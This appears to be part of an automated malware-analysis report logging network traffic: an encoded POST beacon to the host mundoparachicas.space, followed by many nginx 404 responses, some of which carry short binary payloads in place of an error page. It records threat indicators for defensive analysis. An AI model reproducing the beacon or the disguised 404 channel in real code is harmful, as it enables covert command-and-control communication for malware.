      Source: unknown | HTTP traffic detected: POST /dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 | Content-Length: 96 | Host: mundoparachicas.space
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:27 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 04 00 00 00 72 e8 85 e9 | Data Ascii: r
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:29 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:30 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:32 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:33 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:35 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:36 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:41 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:42 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:48 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:49 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 09 78 49 e3 2b 0f e9 ed 57 f7 9f f6 af 30 da 2d da f5 6c 58 00 85 86 8b 80 61 cc 3b | Data Ascii: #\6xI+W0-lXa;
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:55 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:48:57 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 e8 d5 7f e5 7c | Data Ascii: #\6U9H-anYp7vZW|
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:49:02 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:49:03 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:49:03 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Tue, 06 Aug 2024 12:50:13 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
